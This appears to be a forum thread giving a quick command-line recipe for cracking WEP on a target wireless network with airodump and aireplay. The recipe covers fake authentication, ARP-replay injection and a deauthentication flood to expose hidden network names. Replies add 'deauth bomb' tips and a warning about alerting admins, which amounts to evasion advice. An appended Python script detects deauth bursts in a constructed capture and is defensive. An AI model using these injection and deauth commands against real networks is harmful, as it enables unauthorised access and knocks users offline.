
Thread: An even quicker way of cracking WEP with B|T

  1. #1
    Just burned his ISO (Join Date: Mar 2006, Posts: 3)

    An even quicker way of cracking WEP with B|T

    This is a guide for all those REALLY lazy people out there, who come into #remote-exploit complaining that they don't understand the guides on here.
    Granted, you people should be directed to www.google.com, or shot... whichever works best.

    However! If this will save me some time explaining later... I'm all for it.

    FIRST NOTE:
    My laptop which I use BackTrack on is poop. So I try not to run X whenever possible, so for this guide, let's just assume that you're running it CLI style.
    For this tutorial I am using a Proxim Orinoco Gold card (8470-WD).
    This device runs on ath0.


    SECOND NOTE:
    someone buy me a nice laptop!


    ###############################
    login to system
    airodump ath0 outfile 0 1

    ALT F2

    login to system
    aireplay ath0 -1 0 -e TARGETESSID -a TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5
    aireplay ath0 -3 -e TARGETESSID -b TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985

    If you're close enough to the AP, the AP isn't heavily protected against packet injection, AND you've got a rough idea what you're doing, you should see the IVs flying up in ALT F1 (airodump).
    If not, unlucky, won't work this time. May I suggest you read up on what you're doing and find a better way of doing it.

    SIDE NOTE: If the AP you're targeting does not broadcast its ESSID, run:
    aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5

    This should deauth clients, forcing them to reconnect, and there's a chance you'll pick up the ESSID during this process.

    Good luck!

  2. #2
    Junior Member (Join Date: Feb 2006, Posts: 72)

    Gives flame a Gold Star. Thanks for keeping it easy for the lazy people.
    \|,,,,,,,,,,,\|/,,,,,,,,,,,,|/
    -(o)===(<(O)>)===(o)-
    /|''''''''''''''''`/|\'''''''''''''''''''|\

  3. #3
    Junior Member (Join Date: Feb 2006, Posts: 38)

    As far as I know, Kismet will find the SSID of APs. Mine doesn't broadcast, but given about 30 seconds, Kismet identifies my ID.

  4. #4
    Just burned his ISO (Join Date: Mar 2006, Posts: 3)

    OK, well, Kismet can do it sometimes, but I've found the best way of getting a hidden ESSID is to deauth bomb the target :S but use whatever works best for you.

  5. #5
    Junior Member (Join Date: Feb 2006, Posts: 72)

    If you issue too many DeAuths in secure airspace you may alert an Admin to your presence. Beware!
    \|,,,,,,,,,,,\|/,,,,,,,,,,,,|/
    -(o)===(<(O)>)===(o)-
    /|''''''''''''''''`/|\'''''''''''''''''''|\

  6. #6
    Junior Member (Join Date: Feb 2006, Posts: 38)

    Doesn't surprise me, but could you tell me what signs I'd expect to see? I've deauthed my computer many times. I'd run the command, and if, when it completes, I don't get ARP packets, I'd issue it again. Sometimes doing it 5 or more times with 10 deauths. Never did I lose connectivity on MSN or have Windows warn me I lost connection.

    I'm assuming it's all in router logs?
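On the question in #5 and #6 of what signs a deauth bomb leaves for an admin, here is an added example of the detection side (it is not code from this thread): it parses raw 802.11 management headers and flags any transmitter that sends a burst of deauthentication or disassociation frames inside a short window, the pattern that `-0 135` produces, while a lone deauth (normal when a client roams) is ignored. The capture and the AP and client MAC addresses are constructed for the example and are not from any real network.

```python
from collections import defaultdict, deque

MGMT, DEAUTH, DISASSOC, BEACON = 0, 12, 10, 8   # 802.11 type / management subtypes

def mac_to_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_header(frame: bytes):
    """Return (ftype, subtype, addr1, addr2, addr3) from a raw 802.11 MAC header."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc = frame[0]  # frame control: bits 2-3 are the type, bits 4-7 the subtype
    return ((fc >> 2) & 0x3, (fc >> 4) & 0xF,
            mac_to_str(frame[4:10]), mac_to_str(frame[10:16]), mac_to_str(frame[16:22]))

def deauth_burst_alerts(frames, window=5.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame) in capture order.
    Flags a transmitter (addr2) once it has sent more than `threshold`
    deauth/disassoc frames inside any `window`-second span.
    Returns [(addr2, count_at_alert, first_ts, alert_ts), ...]."""
    recent = defaultdict(deque)  # transmitter -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, frame in frames:
        ftype, subtype, _, src, _ = parse_header(frame)
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, len(q), q[0], ts))
    return alerts

def mgmt_frame(subtype, dst, src, bssid, body=b"\x07\x00"):
    """Build a minimal 802.11 management frame (constructed input, no FCS)."""
    fc = bytes([(MGMT << 2) | (subtype << 4), 0x00])
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + body  # duration, addrs, seq ctrl

# Constructed capture: hypothetical AP and client addresses, not from a real network.
AP, STA, BCAST = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "ff:ff:ff:ff:ff:ff"

def sample_capture():
    frames = [(0.0, mgmt_frame(BEACON, BCAST, AP, AP, b""))]   # ordinary beacon
    frames.append((1.0, mgmt_frame(DEAUTH, STA, AP, AP)))       # one deauth: benign
    # 135 forged broadcast deauths in under 3 seconds, the shape of `-0 135`
    frames += [(10.0 + i * 0.02, mgmt_frame(DEAUTH, BCAST, AP, AP)) for i in range(135)]
    return frames

if __name__ == "__main__":
    for src, n, t0, t1 in deauth_burst_alerts(sample_capture()):
        print(f"deauth burst from {src}: {n} frames between t={t0:.2f}s and t={t1:.2f}s")
```

A wireless IDS applies the same rule to frames captured in monitor mode; a consumer router's log will usually show only the clients dropping and reassociating, not the forged frames themselves.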
